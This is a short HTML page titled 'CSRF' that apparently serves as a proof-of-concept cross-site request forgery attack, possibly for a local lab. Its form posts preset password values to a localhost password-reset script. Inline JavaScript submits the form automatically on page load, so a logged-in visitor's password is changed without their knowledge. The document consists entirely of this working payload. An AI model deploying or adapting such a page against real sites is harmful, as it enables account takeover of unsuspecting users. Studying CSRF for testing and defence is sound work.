<!DOCTYPE html>
<html>
<head>
    <title>CSRF</title>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<body>
    <form id="csrf" method="POST" action="http://localhost/reset_pwd_csrf.php">
        <div class="form-group">
            <input type="password" class="form-control" name="new_password" id="new_password" value="resetpwd">
            <input type="password" class="form-control" name="confirm_password" id="confirm_password" value="resetpwd">
        </div>
        <button type="submit" class="btn btn-primary" name="reset">Reset Password</button>
    </form>
    <script>
        document.getElementById("csrf").submit();
    </script>
</body>
</html>
